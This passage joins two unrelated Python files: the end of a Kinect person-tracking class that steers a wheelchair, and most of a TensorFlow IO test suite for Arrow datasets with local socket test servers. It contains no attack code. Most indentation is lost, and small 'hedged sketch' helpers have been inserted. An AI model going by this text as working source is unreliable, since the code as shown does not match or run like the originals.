cv.putText(frame,text,(16,68), font, 0.6,(0,0,255),1,cv.LINE_AA)
#Move the wheelchair
self.wheelchair.transmitCommand(speed,angle,command)
if self.info == True:
self.log("INFO = The Speed is set to "+str(speed)+" and the Angle is set as "+str(angle))
else:
self.wheelchair.transmitCommand(0,0,"RUN")
frame = self.addText(frame,"No People to Track",self.green)
text = "Speed adjusted to "+str(0)+" and angle to "+str(0)
font = cv.FONT_HERSHEY_SIMPLEX
cv.putText(frame,text,(16,68), font, 0.6,(0,255,0),1,cv.LINE_AA)
if self.showClock == True:
frame = self.addClock(frame)
if self.showFPS == True:
frame = self.addFPS(frame,self.fpsProcessing)
if self.displayStream == True:
#Show the frame
cv.imshow('Stream of {}'.format(self.kinectImage_name),frame)
#Calculate FPS
end = time.time()
adjustedDelay = delay-(end-start)
if adjustedDelay < 0:
adjustedDelay = 0
self.fpsProcessing = 1/(end-start)
else:
self.fpsProcessing = self.fps
# quit program when 'esc' key is pressed
if cv.waitKey(1) & 0xFF == ord('q'):
self.status = False
break
time.sleep(adjustedDelay)
self.retrieveFrames = False
self.tracking = False
cv.destroyAllWindows()
#Collision Prevention
def collisionPrevention(self, imageFrame, depthFrame):
closestPoint = self.scanImage(depthFrame)
closestObject = self.distanceCalc(closestPoint[0])
self.wheelchair.calcMaxSpeed(closestObject)
point = (closestPoint[1],closestPoint[2])
        imageFrame = self.addMarker(imageFrame,[point],self.blue)
return imageFrame
def getFrames(self):
returned, depthFrame = self.depth.read()
returned, imageFrame = self.image.read()
if returned == False:
self.log("ERROR = Cannot Access Vision API.")
depthFrame = cv.imread('testing/personTracking/nostream.jpg',cv.IMREAD_COLOR)
imageFrame = cv.imread('testing/personTracking/nostream.jpg',cv.IMREAD_COLOR)
#Convert Depth Image to Grayscale
depthFrame = cv.cvtColor(depthFrame, cv.COLOR_BGR2GRAY)
imageFrame = imutils.resize(imageFrame, width=self.frameWidth)
depthFrame = imutils.resize(depthFrame, width=self.frameWidth)
return imageFrame, depthFrame
@staticmethod
def addClock(frame):
#Add clock to the frame
font = cv.FONT_HERSHEY_SIMPLEX
currentDateTime = datetime.now().strftime("%d/%m/%Y %H:%M:%S.%f")
cv.putText(frame,currentDateTime,(16,20), font, 0.6,(255,0,0),1,cv.LINE_AA)
return frame
@staticmethod
def addFPS(frame,fps):
        #Add FPS counter to the frame
font = cv.FONT_HERSHEY_SIMPLEX
text = '%.2ffps'%round(fps,2)
cv.putText(frame,text,(16,44), font, 0.6,(255,0,0),1,cv.LINE_AA)
return frame
@staticmethod
def addText(frame,text,colour):
        #Add status text to the frame
font = cv.FONT_HERSHEY_SIMPLEX
cv.putText(frame,text,(16,90), font, 0.6,colour,1,cv.LINE_AA)
return frame
def detectPeople(self,image):
#Detect people in the passed image
(boundingBoxes, weights) = self.hog.detectMultiScale(image, winStride=(4, 4), padding=(4, 4), scale=1.2)
boxes = len(boundingBoxes)
if self.nms == True:
boundingBoxes = self.applyNMS(boundingBoxes)
boxesNMA = len(boundingBoxes)
if self.info == True:
if self.nms == True:
#Show additional info
print("INFO = {}: {} original boxes, {} after suppression".format(self.kinectImage_name, boxes, boxesNMA))
else:
#Show additional info
print("INFO = {}: {} bounding boxes".format(self.kinectImage_name,boxes))
if len(boundingBoxes) > 0:
i = 0
personCentres = []
for (xA, yA, xB, yB) in boundingBoxes:
x = int(((xB -xA)/2) + xA)
y = int(((yB -yA)/2) + yA)
personCentres.insert(i,(x,y))
i = i + 1
else:
personCentres = 0
return boundingBoxes, personCentres
@staticmethod
def applyNMS(boundingBoxes):
#Applying NMS
boundingBoxes = np.array([[x, y, x + w, y + h] for (x, y, w, h) in boundingBoxes])
NMAboundingBoxes = non_max_suppression(boundingBoxes, probs=None, overlapThresh=0.65)
return NMAboundingBoxes
@staticmethod
def addMarker(image,points,colour):
crosshairHeight = 20
crosshairWidth = 20
for (x, y) in points:
#Horizontal Line & Vertical Line on Video Image
cv.line(image,((x-crosshairWidth),y),((x+crosshairWidth),y),colour,2)
cv.line(image,(x,(y-crosshairHeight)),(x,(y+crosshairHeight)),colour,2)
return image
@staticmethod
def addBoundingBoxes(image,boxes,colour):
#Draw boxes without NMS
for (xA, yA, xB, yB) in boxes:
cv.rectangle(image, (xA, yA), (xB, yB),colour, 2)
return image
@staticmethod
def addGoal(image,colour):
offset = 0
crosshairHeight = 50
crosshairWidth = 50
width = image.shape[1]
height = image.shape[0]
goalWidth = int((width/2) - offset)
goalHeight = int((height/2) - offset)
goalPosition = [goalHeight, goalWidth]
#Horizontal Line & Vertical Line on Video Image
cv.line(image,((goalWidth-crosshairWidth),goalHeight),((goalWidth+crosshairWidth),goalHeight),colour,2)
cv.line(image,(goalWidth,(goalHeight-crosshairHeight)),(goalWidth,(goalHeight+crosshairHeight)),colour,2)
return image, goalPosition
#Determine Angle
    def calcAngle(self,goalPosition,personPosition,height,width):
        xG = goalPosition[0]
xP = personPosition[0]
mappingRange = width/2
if xP > xG:
angle = self.maxAngle * ((xP-mappingRange)/mappingRange)
elif xP < xG:
angle = self.minAngle * ((mappingRange-xP)/mappingRange)
else:
angle = 0
angle = int(angle)
return angle
#Determine Speed
def calcSpeed(self,personPosition,depthFrame):
personDistance = self.calcPersonDistance(personPosition,depthFrame)
self.log("INFO = Target is "+str(round(personDistance,4))+"m away.")
if personDistance < 0.2:
speed = 0
elif personDistance >=0.2:
speed = 10+int(5*personDistance)
if speed > self.maxSpeed:
speed = self.maxSpeed
return speed
#Providing the Location of a person, returns their distance away
def calcPersonDistance(self,personPosition,depthFrame):
x = personPosition[1]
y = personPosition[0]
depthFrame = cv.medianBlur(depthFrame,5)
depthValue = depthFrame[x,y]
distance = self.distanceCalc(depthValue)
return distance
    #Returns information about how far away a point in an image is
@staticmethod
def distanceCalc(depth):
a = -0.0000000069
b = 0.0000064344
c = -0.0019066199
d = 0.2331614352
e = -9.5744837865
        #Fourth-order custom estimation
distance = (a*math.pow(depth,4))+(b*math.pow(depth,3))+(c*math.pow(depth,2))+(d*depth)+e
if distance < 0:
distance = 0
return distance
#In image with multiple people, select a target
@staticmethod
def selectPerson(boundingBoxes,personCentres):
box = 0
largestArea = 0
person = 0
#Draw bounding boxes with NMS
for (xA, yA, xB, yB) in boundingBoxes:
            boxArea = (xB-xA)*(yB-yA)
if boxArea > largestArea:
person = box
largestArea = boxArea
box = box + 1
personPosition = personCentres[person]
boundingBox = boundingBoxes[person]
return personPosition, boundingBox
#Optimised method for finding the closest point in an image
@staticmethod
@nb.jit(nopython=True)
def scanImage(depthData):
height = len(depthData)
width = len(depthData[0])
#Initialise with worst case
pointValue = 2048
pointHeight = 0
pointWidth = 0
        #Threshold for dealing with anomalies (reflective surfaces)
threshold = 0
#Populate Array with Data
for h in range (0,height):
for w in range (0,width):
if (depthData[h,w] <= pointValue) and (depthData[h,w] >= threshold):
pointValue = depthData[h,w]
pointHeight = h
pointWidth = w
results = [pointValue, pointWidth, pointHeight]
return results
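#--- Hedged sketch (not part of the original class) ---
#Worked example of the depth-to-distance polynomial in PersonTracking.distanceCalc();
#raw Kinect depth values are assumed to lie roughly in the 0-2047 range.
def exampleDistanceCurve():
    for rawDepth in (400, 600, 800, 1000):
        print("depth value", rawDepth, "->", round(PersonTracking.distanceCalc(rawDepth), 3), "m")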
|
test_arrow.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
# ==============================================================================
"""Tests for ArrowDataset."""
from collections import namedtuple
import io
import os
import socket
import tempfile
import threading
import pytest
import pyarrow as pa
import numpy.testing as npt
import tensorflow as tf
import tensorflow_io as tfio
TruthData = namedtuple("TruthData", ["data", "output_types", "output_shapes"])
class ArrowTestBase(tf.test.TestCase):
"""ArrowTestBase"""
@classmethod
def setUpClass(cls): # pylint: disable=invalid-name
"""setUpClass"""
cls.scalar_data = [
[True, False, True, True],
[1, 2, -3, 4],
[1, 2, -3, 4],
[1, 2, -3, 4],
[1, 2, -3, 4],
[1, 2, 3, 4],
[1, 2, 3, 4],
[1, 2, 3, 4],
[1, 2, 3, 4],
[1.1, 2.2, 3.3, 4.4],
[1.1, 2.2, 3.3, 4.4],
]
cls.scalar_dtypes = (
tf.dtypes.bool,
tf.dtypes.int8,
tf.dtypes.int16,
tf.dtypes.int32,
tf.dtypes.int64,
tf.dtypes.uint8,
tf.dtypes.uint16,
tf.dtypes.uint32,
tf.dtypes.uint64,
tf.dtypes.float32,
tf.dtypes.float64,
)
cls.scalar_shapes = tuple([tf.TensorShape([]) for _ in cls.scalar_dtypes])
cls.list_fixed_data = [
[[1, 1], [2, 2], [3, 3], [4, 4]],
[[1, 1], [2, 2], [3, 3], [4, 4]],
[[1.1, 1.1], [2.2, 2.2], [3.3, 3.3], [4.4, 4.4]],
[[1.1, 1.1], [2.2, 2.2], [3.3, 3.3], [4.4, 4.4]],
]
cls.list_fixed_dtypes = (
tf.dtypes.int32,
tf.dtypes.int64,
tf.dtypes.float32,
tf.dtypes.float64,
)
cls.list_fixed_shapes = tuple(
[tf.TensorShape([None]) for _ in cls.list_fixed_dtypes]
)
cls.list_var_data = [
[[1], [2, 2], [3, 3, 3], [4, 4, 4]],
[[1.1], [2.2, 2.2], [3.3, 3.3, 3.3], [4.4, 4.4, 4.4]],
]
cls.list_var_dtypes = (tf.dtypes.int32, tf.dtypes.float32)
cls.list_var_shapes = (tf.TensorShape([None]), tf.TensorShape([None]))
cls.list_data = cls.list_fixed_data + cls.list_var_data
cls.list_dtypes = cls.list_fixed_dtypes + cls.list_var_dtypes
cls.list_shapes = cls.list_fixed_shapes + cls.list_var_shapes
def get_arrow_type(self, dt, is_list):
"""get_arrow_type"""
if dt == tf.dtypes.bool:
arrow_type = pa.bool_()
elif dt == tf.dtypes.int8:
arrow_type = pa.int8()
elif dt == tf.dtypes.int16:
arrow_type = pa.int16()
elif dt == tf.dtypes.int32:
arrow_type = pa.int32()
elif dt == tf.dtypes.int64:
arrow_type = pa.int64()
elif dt == tf.dtypes.uint8:
arrow_type = pa.uint8()
elif dt == tf.dtypes.uint16:
arrow_type = pa.uint16()
elif dt == tf.dtypes.uint32:
arrow_type = pa.uint32()
elif dt == tf.dtypes.uint64:
arrow_type = pa.uint64()
elif dt == tf.dtypes.float16:
arrow_type = pa.float16()
elif dt == tf.dtypes.float32:
arrow_type = pa.float32()
elif dt == tf.dtypes.float64:
arrow_type = pa.float64()
elif dt == tf.dtypes.string:
arrow_type = pa.string()
else:
raise TypeError("Unsupported dtype for Arrow" + str(dt))
if is_list:
arrow_type = pa.list_(arrow_type)
return arrow_type
def make_record_batch(self, truth_data):
"""Make an Arrow RecordBatch for given test data"""
arrays = [
pa.array(
truth_data.data[col],
type=self.get_arrow_type(
truth_data.output_types[col],
isinstance(truth_data.data[col][0], list),
),
)
for col in range(len(truth_data.output_types))
]
names = ["{}_[{}]".format(i, a.type) for i, a in enumerate(arrays)]
return pa.RecordBatch.from_arrays(arrays, names)
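# Hedged sketch (not part of the original tests): building a small RecordBatch by
# hand with the same "{index}_[{arrow type}]" column naming convention used above.
def _example_record_batch():
    arrays = [pa.array([1, 2, 3], type=pa.int32()), pa.array([1.0, 2.0, 3.0], type=pa.float64())]
    names = ["{}_[{}]".format(i, a.type) for i, a in enumerate(arrays)]
    return pa.RecordBatch.from_arrays(arrays, names)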
class ArrowIOTensorTest(ArrowTestBase):
"""ArrowIOTensorTest"""
@classmethod
def setUpClass(cls): # pylint: disable=invalid-name
"""setUpClass"""
super().setUpClass()
cls.scalar_shapes = tuple([tf.TensorShape([len(c)]) for c in cls.scalar_data])
cls.list_fixed_shapes = tuple(
[tf.TensorShape([len(c), len(c[0])]) for c in cls.list_fixed_data]
)
def make_table(self, truth_data):
"""make_table"""
batch = self.make_record_batch(truth_data)
return pa.Table.from_batches([batch])
def run_test_case(self, iot, truth_data, columns):
"""run_test_case"""
self.assertEqual(iot.columns, columns)
for i, column in enumerate(columns):
iot_col = iot(column)
self.assertEqual(iot_col.dtype, truth_data.output_types[i])
self.assertEqual(iot_col.shape, truth_data.output_shapes[i])
npt.assert_almost_equal(iot_col.to_tensor().numpy(), truth_data.data[i])
def test_arrow_io_tensor_scalar(self):
"""test_arrow_io_tensor_scalar"""
truth_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
table = self.make_table(truth_data)
iot = tfio.IOTensor.from_arrow(table)
self.run_test_case(iot, truth_data, table.column_names)
def test_arrow_io_tensor_lists(self):
"""test_arrow_io_tensor_lists"""
truth_data = TruthData(
self.list_fixed_data, self.list_fixed_dtypes, self.list_fixed_shapes
)
table = self.make_table(truth_data)
iot = tfio.IOTensor.from_arrow(table)
self.run_test_case(iot, truth_data, table.column_names)
def test_arrow_io_tensor_mixed(self):
"""test_arrow_io_tensor_mixed"""
truth_data = TruthData(
self.scalar_data + self.list_fixed_data,
self.scalar_dtypes + self.list_fixed_dtypes,
self.scalar_shapes + self.list_fixed_shapes,
)
table = self.make_table(truth_data)
iot = tfio.IOTensor.from_arrow(table)
self.run_test_case(iot, truth_data, table.column_names)
def test_arrow_io_tensor_chunked(self):
"""test_arrow_io_tensor_chunked"""
num_chunks = 2
chunk_data = TruthData(
self.scalar_data + self.list_fixed_data,
self.scalar_dtypes + self.list_fixed_dtypes,
self.scalar_shapes + self.list_fixed_shapes,
)
# Make a table with double the data for 2 chunks
table = self.make_table(chunk_data)
table = pa.concat_tables([table] * num_chunks)
# Double the batch size of the truth data
output_shapes = self.scalar_shapes + self.list_fixed_shapes
output_shapes = [
tf.TensorShape([d + d if i == 0 else d for i, d in enumerate(shape)])
for shape in output_shapes
]
truth_data = TruthData(
[d * num_chunks for d in chunk_data.data],
self.scalar_dtypes + self.list_fixed_dtypes,
output_shapes,
)
self.assertGreater(table[0].num_chunks, 1)
iot = tfio.IOTensor.from_arrow(table)
self.run_test_case(iot, truth_data, table.column_names)
def test_arrow_io_dataset_map_from_file(self):
"""test_arrow_io_dataset_map_from_file"""
column = "a"
dtype = tf.dtypes.int64
column_dtype = self.get_arrow_type(dtype, False)
arr = pa.array(list(range(100)), column_dtype)
table = pa.Table.from_arrays([arr], [column])
spec = {column: dtype}
with tempfile.NamedTemporaryFile(delete=False) as f:
with pa.RecordBatchFileWriter(f.name, table.schema) as writer:
for batch in table.to_batches():
writer.write_batch(batch)
def from_file(_):
reader = pa.RecordBatchFileReader(f.name)
t = reader.read_all()
tio = tfio.IOTensor.from_arrow(t, spec=spec)
return tio(column).to_tensor()
num_iters = 2
ds = tf.data.Dataset.range(num_iters).map(from_file)
expected = table[column].to_pylist()
iter_count = 0
for result in ds:
npt.assert_array_equal(result, expected)
iter_count += 1
self.assertEqual(iter_count, num_iters)
os.unlink(f.name)
def test_arrow_io_dataset_map_py_func(self):
"""test_arrow_io_dataset_map_from_py_func"""
column = "a"
dtype = tf.dtypes.int64
column_dtype = self.get_arrow_type(dtype, False)
arr = pa.array(list(range(100)), column_dtype)
table = pa.Table.from_arrays([arr], [column])
spec = {column: dtype}
with tempfile.NamedTemporaryFile(delete=False) as f:
with pa.RecordBatchFileWriter(f.name, table.schema) as writer:
for batch in table.to_batches():
writer.write_batch(batch)
def read_table(filename):
filename = filename.numpy().decode("utf-8")
reader = pa.RecordBatchFileReader(filename)
return reader.read_all()
def from_py_func(filename):
from tensorflow_io.python.ops.arrow_io_tensor_ops import ArrowIOResource
table_res = ArrowIOResource.from_py_function(read_table, [filename])
tio = tfio.IOTensor.from_arrow(table_res, spec=spec)
return tio(column).to_tensor()
num_iters = 2
ds = tf.data.Dataset.from_tensor_slices([f.name, f.name]).map(from_py_func)
expected = table[column].to_pylist()
iter_count = 0
for result in ds:
npt.assert_array_equal(result, expected)
iter_count += 1
self.assertEqual(iter_count, num_iters)
os.unlink(f.name)
def test_spec_selection_by_column_name(self):
"""test_spec_selection_by_column_name"""
def from_func(_):
a = pa.array([1, 2, 3], type=pa.int32())
b = pa.array([4, 5, 6], type=pa.int64())
c = pa.array([7, 8, 9], type=pa.float32())
t = pa.Table.from_arrays([a, b, c], ["a", "b", "c"])
foo = tfio.IOTensor.from_arrow(t, spec={"b": tf.int64})
return foo("b").to_tensor()
ds = tf.data.Dataset.range(1).map(from_func)
results = list(ds.as_numpy_iterator())
self.assertEqual(len(results), 1)
result = results[0]
b = pa.array([4, 5, 6], type=pa.int64())
expected = b.to_numpy()
npt.assert_array_equal(result, expected)
def test_spec_selection_by_column_index(self):
"""test_spec_selection_by_column_index"""
def from_func(_):
a = pa.array([1, 2, 3], type=pa.int32())
b = pa.array([4, 5, 6], type=pa.int64())
c = pa.array([7, 8, 9], type=pa.float32())
t = pa.Table.from_arrays([a, b, c], ["a", "b", "c"])
foo = tfio.IOTensor.from_arrow(t, spec={1: tf.int64})
return foo(1).to_tensor()
ds = tf.data.Dataset.range(1).map(from_func)
results = list(ds.as_numpy_iterator())
self.assertEqual(len(results), 1)
result = results[0]
b = pa.array([4, 5, 6], type=pa.int64())
expected = b.to_numpy()
npt.assert_array_equal(result, expected)
class ArrowDatasetTest(ArrowTestBase):
"""ArrowDatasetTest"""
def run_test_case(self, dataset, truth_data, batch_size=None):
"""run_test_case"""
def is_float(dtype):
"""Check if dtype is a floating-point"""
return dtype in [tf.dtypes.float16, tf.dtypes.float32, tf.dtypes.float64]
def evaluate_result(value):
"""Check the results match truth data"""
for i, col in enumerate(dataset.columns):
if truth_data.output_shapes[col].ndims == 0:
if is_float(truth_data.output_types[col]):
self.assertAlmostEqual(value[i], truth_data.data[col][row], 4)
else:
self.assertEqual(value[i], truth_data.data[col][row])
elif truth_data.output_shapes[col].ndims == 1:
if is_float(truth_data.output_types[col]):
for j, v in enumerate(value[i]):
self.assertAlmostEqual(v, truth_data.data[col][row][j], 4)
else:
self.assertListEqual(
value[i].tolist(), truth_data.data[col][row]
)
# Row counter for each single result or batch of multiple rows
row = 0
# Iterate over the dataset
for results in dataset:
# For batches, iterate over each row in batch or remainder at end
for result_idx in range(batch_size or 1):
# Get a single row value
if batch_size is None:
value = [r.numpy() for r in results]
# Get a batch of values and check 1 row at a time
else:
if result_idx == 0:
value_batch = [r.numpy() for r in results]
# Check for a partial result
if result_idx == value_batch[0].shape[0]:
break
# Get a single row out of the batch
value = [v[result_idx] for v in value_batch]
# Check the result then increment the row counter
evaluate_result(value)
row += 1
# Check that all data was returned by Dataset
self.assertEqual(row, len(truth_data.data[0]))
def test_arrow_dataset(self):
"""test_arrow_dataset"""
import tensorflow_io.arrow as arrow_io
truth_data = TruthData(
self.scalar_data + self.list_data,
self.scalar_dtypes + self.list_dtypes,
self.scalar_shapes + self.list_shapes,
)
batch = self.make_record_batch(truth_data)
# test all columns selected
dataset = arrow_io.ArrowDataset.from_record_batches(
batch, truth_data.output_types, truth_data.output_shapes
)
self.run_test_case(dataset, truth_data)
# test column selection
columns = (1, 3, len(truth_data.output_types) - 1)
dataset = arrow_io.ArrowDataset.from_record_batches(
batch,
tuple([truth_data.output_types[c] for c in columns]),
tuple([truth_data.output_shapes[c] for c in columns]),
columns=columns,
)
self.run_test_case(dataset, truth_data)
# test construction from pd.DataFrame
df = batch.to_pandas()
dataset = arrow_io.ArrowDataset.from_pandas(df, preserve_index=False)
self.run_test_case(dataset, truth_data)
def test_arrow_dataset_with_strings(self):
"""test_arrow_dataset"""
import tensorflow_io.arrow as arrow_io
scalar_data = [
[b"1.1", b"2.2", b"3.3", b"4.4"],
]
scalar_dtypes = (tf.dtypes.string,)
scalar_shapes = tuple([tf.TensorShape([]) for _ in scalar_dtypes])
truth_data = TruthData(scalar_data, scalar_dtypes, scalar_shapes)
batch = self.make_record_batch(truth_data)
# test all columns selected
dataset = arrow_io.ArrowDataset.from_record_batches(
batch, truth_data.output_types, truth_data.output_shapes
)
self.run_test_case(dataset, truth_data)
def test_from_pandas_preserve_index(self):
"""test_from_pandas_preserve_index"""
import tensorflow_io.arrow as arrow_io
data_v = [
[1.0, 2.0, 3.0],
[0.2, 0.4, 0.8],
]
truth_data = TruthData(
data_v,
(tf.dtypes.float32, tf.dtypes.float32),
(tf.TensorShape([]), tf.TensorShape([])),
)
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
dataset = arrow_io.ArrowDataset.from_pandas(df, preserve_index=True)
# Add index column to test data to check results
truth_data_with_index = TruthData(
truth_data.data + [range(len(truth_data.data[0]))],
truth_data.output_types + (tf.dtypes.int64,),
truth_data.output_shapes + (tf.TensorShape([]),),
)
self.run_test_case(dataset, truth_data_with_index)
# Test preserve_index again, selecting second column only
# NOTE: need to select TruthData because `df` gets selected also
truth_data_selected_with_index = TruthData(
truth_data_with_index.data[1:],
truth_data_with_index.output_types[1:],
truth_data_with_index.output_shapes[1:],
)
dataset = arrow_io.ArrowDataset.from_pandas(
df, columns=(1,), preserve_index=True
)
self.run_test_case(dataset, truth_data_selected_with_index)
def test_arrow_feather_dataset(self):
"""test_arrow_feather_dataset"""
import tensorflow_io.arrow as arrow_io
from pyarrow.feather import write_feather
# Feather files currently do not support columns of list types
truth_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
# Create a tempfile that is deleted after tests run
with tempfile.NamedTemporaryFile(delete=False) as f:
write_feather(df, f, version=1)
# test single file
dataset = arrow_io.ArrowFeatherDataset(
f.name,
list(range(len(truth_data.output_types))),
truth_data.output_types,
truth_data.output_shapes,
)
self.run_test_case(dataset, truth_data)
# test single file with 'file://' prefix
dataset = arrow_io.ArrowFeatherDataset(
"file://{}".format(f.name),
list(range(len(truth_data.output_types))),
truth_data.output_types,
truth_data.output_shapes,
)
self.run_test_case(dataset, truth_data)
# test multiple files
dataset = arrow_io.ArrowFeatherDataset(
[f.name, f.name],
list(range(len(truth_data.output_types))),
truth_data.output_types,
truth_data.output_shapes,
)
truth_data_doubled = TruthData(
[d * 2 for d in truth_data.data],
truth_data.output_types,
truth_data.output_shapes,
)
self.run_test_case(dataset, truth_data_doubled)
# test construction from schema
dataset = arrow_io.ArrowFeatherDataset.from_schema(f.name, batch.schema)
self.run_test_case(dataset, truth_data)
os.unlink(f.name)
def test_arrow_socket_dataset(self):
"""test_arrow_socket_dataset"""
import tensorflow_io.arrow as arrow_io
truth_data = TruthData(
self.scalar_data + self.list_data,
self.scalar_dtypes + self.list_dtypes,
self.scalar_shapes + self.list_shapes,
)
batch = self.make_record_batch(truth_data)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("127.0.0.1", 0))
sock.listen(1)
host_addr, port = sock.getsockname()
host = "{}:{}".format(host_addr, port)
def run_server(num_batches):
conn, _ = sock.accept()
outfile = conn.makefile(mode="wb")
writer = pa.RecordBatchStreamWriter(outfile, batch.schema)
for _ in range(num_batches):
writer.write_batch(batch)
writer.close()
outfile.close()
conn.close()
sock.close()
# test with multiple batches, construct from schema
num_batches = 2
server = threading.Thread(target=run_server, args=(num_batches,))
server.start()
dataset = arrow_io.ArrowStreamDataset.from_schema(host, batch.schema)
truth_data_mult = TruthData(
[d * num_batches for d in truth_data.data],
truth_data.output_types,
truth_data.output_shapes,
)
self.run_test_case(dataset, truth_data_mult)
server.join()
def test_arrow_unix_socket_dataset(self):
"""test_arrow_unix_socket_dataset"""
import tensorflow_io.arrow as arrow_io
if os.name == "nt":
self.skipTest("Unix Domain Sockets not supported on Windows")
truth_data = TruthData(
self.scalar_data + self.list_data,
self.scalar_dtypes + self.list_dtypes,
self.scalar_shapes + self.list_shapes,
)
batch = self.make_record_batch(truth_data)
host = os.path.join(tempfile.gettempdir(), "arrow_io_stream")
# Make sure the socket does not already exist
try:
os.unlink(host)
except OSError:
if os.path.exists(host):
raise
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(host)
sock.listen(1)
def run_server(num_batches):
conn, _ = sock.accept()
outfile = conn.makefile(mode="wb")
writer = pa.RecordBatchStreamWriter(outfile, batch.schema)
for _ in range(num_batches):
writer.write_batch(batch)
writer.close()
outfile.close()
conn.close()
sock.close()
# test with multiple batches, construct from schema
num_batches = 2
server = threading.Thread(target=run_server, args=(num_batches,))
server.start()
endpoint = "unix://{}".format(host)
dataset = arrow_io.ArrowStreamDataset.from_schema(endpoint, batch.schema)
truth_data_mult = TruthData(
[d * num_batches for d in truth_data.data],
truth_data.output_types,
truth_data.output_shapes,
)
self.run_test_case(dataset, truth_data_mult)
server.join()
def test_multiple_stream_hosts(self):
"""test_multiple_stream_hosts"""
import tensorflow_io.arrow as arrow_io
if os.name == "nt":
self.skipTest("Unix Domain Sockets not supported on Windows")
truth_data = TruthData(
self.scalar_data + self.list_data,
self.scalar_dtypes + self.list_dtypes,
self.scalar_shapes + self.list_shapes,
)
batch = self.make_record_batch(truth_data)
hosts = [
os.path.join(tempfile.gettempdir(), "arrow_io_stream_{}".format(i))
for i in range(1, 3)
]
def start_server(host):
"""start_server"""
try:
os.unlink(host)
except OSError:
if os.path.exists(host):
raise
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(host)
sock.listen(1)
def run_server(num_batches):
"""run_server"""
conn, _ = sock.accept()
outfile = conn.makefile(mode="wb")
writer = pa.RecordBatchStreamWriter(outfile, batch.schema)
for _ in range(num_batches):
writer.write_batch(batch)
writer.close()
outfile.close()
conn.close()
sock.close()
# test with multiple batches, construct from schema
server = threading.Thread(target=run_server, args=(1,))
server.start()
return server
servers = [start_server(h) for h in hosts]
endpoints = ["unix://{}".format(h) for h in hosts]
dataset = arrow_io.ArrowStreamDataset.from_schema(endpoints, batch.schema)
truth_data_mult = TruthData(
[d * len(hosts) for d in truth_data.data],
truth_data.output_types,
truth_data.output_shapes,
)
self.run_test_case(dataset, truth_data_mult)
for s in servers:
s.join()
def test_stream_from_pandas(self):
"""test_stream_from_pandas"""
import tensorflow_io.arrow as arrow_io
truth_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
batch_size = 2
# Test preserve index False
dataset = arrow_io.ArrowStreamDataset.from_pandas(
df, batch_size=batch_size, preserve_index=False
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
# Test preserve index True and select all but index columns
truth_data = TruthData(
truth_data.data + [range(len(truth_data.data[0]))],
truth_data.output_types + (tf.dtypes.int64,),
truth_data.output_shapes + (tf.TensorShape([]),),
)
dataset = arrow_io.ArrowStreamDataset.from_pandas(
df, batch_size=batch_size, preserve_index=True
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_stream_from_pandas_remainder(self):
"""Test stream from Pandas that produces partial batch"""
import tensorflow_io.arrow as arrow_io
batch_size = len(self.scalar_data[0]) - 1
truth_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
dataset = arrow_io.ArrowStreamDataset.from_pandas(
df, batch_size=batch_size, preserve_index=False
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_stream_from_pandas_iter(self):
"""test_stream_from_pandas_iter"""
import tensorflow_io.arrow as arrow_io
batch_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
batch = self.make_record_batch(batch_data)
df = batch.to_pandas()
batch_size = 2
num_iters = 3
dataset = arrow_io.ArrowStreamDataset.from_pandas(
(df for _ in range(num_iters)), batch_size=batch_size, preserve_index=False
)
truth_data = TruthData(
[d * num_iters for d in batch_data.data],
batch_data.output_types,
batch_data.output_shapes,
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_stream_from_pandas_not_batched(self):
"""test_stream_from_pandas_not_batched"""
import tensorflow_io.arrow as arrow_io
truth_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
dataset = arrow_io.ArrowStreamDataset.from_pandas(df, preserve_index=False)
self.run_test_case(dataset, truth_data)
def test_stream_from_pandas_repeat(self):
"""test_stream_from_pandas_repeat"""
import tensorflow_io.arrow as arrow_io
batch_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
batch = self.make_record_batch(batch_data)
df = batch.to_pandas()
num_repeat = 10
dataset = arrow_io.ArrowStreamDataset.from_pandas(
df, batch_size=2, preserve_index=False
).repeat(num_repeat)
# patch columns attr so run_test_case can use
dataset.columns = list(range(len(batch_data.output_types)))
truth_data = TruthData(
[d * num_repeat for d in batch_data.data],
batch_data.output_types,
batch_data.output_shapes,
)
self.run_test_case(dataset, truth_data, batch_size=2)
def test_bool_array_type(self):
"""NOTE: need to test this separately because to_pandas fails with
ArrowNotImplementedError: Not implemented type for list in
DataFrameBlock: bool
see https://issues.apache.org/jira/browse/ARROW-4370
"""
import tensorflow_io.arrow as arrow_io
truth_data = TruthData(
[[[False, False], [False, True], [True, False], [True, True]]],
(tf.dtypes.bool,),
(tf.TensorShape([None]),),
)
batch = self.make_record_batch(truth_data)
dataset = arrow_io.ArrowDataset.from_record_batches(
batch, truth_data.output_types, truth_data.output_shapes, columns=(0,)
)
self.run_test_case(dataset, truth_data)
def test_incorrect_column_type(self):
"""Test that a column with incorrect dtype raises error"""
import tensorflow_io.arrow as arrow_io
truth_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
batch = self.make_record_batch(truth_data)
dataset = arrow_io.ArrowDataset.from_record_batches(
batch,
tuple([tf.dtypes.int32 for _ in truth_data.output_types]),
